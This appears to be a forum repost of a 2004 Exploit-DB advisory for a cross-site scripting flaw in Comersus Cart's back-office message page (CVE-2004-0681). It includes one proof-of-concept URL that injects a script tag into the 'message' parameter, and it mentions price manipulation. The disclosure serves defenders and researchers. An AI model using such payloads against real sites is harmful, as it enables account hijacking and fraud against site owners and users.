Exploit Comersus Open Technologies Comersus 5.0 - 'comersus_message.asp' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24261
Проверка EDB
  1. Пройдено
Автор
THOMAS RYAN
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2004-0681
Дата публикации
2004-07-07
Comersus Open Technologies Comersus 5.0 - 'comersus_message.asp' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/10674/info
 
Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order.
 
Comersus Cart version 5.09 is affected by these issues, however, other versions may be prone to these vulnerabilities as well.

http://www.example.com/comersus/backofficeLite/comersus_backoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>
 
Источник
www.exploit-db.com

Похожие темы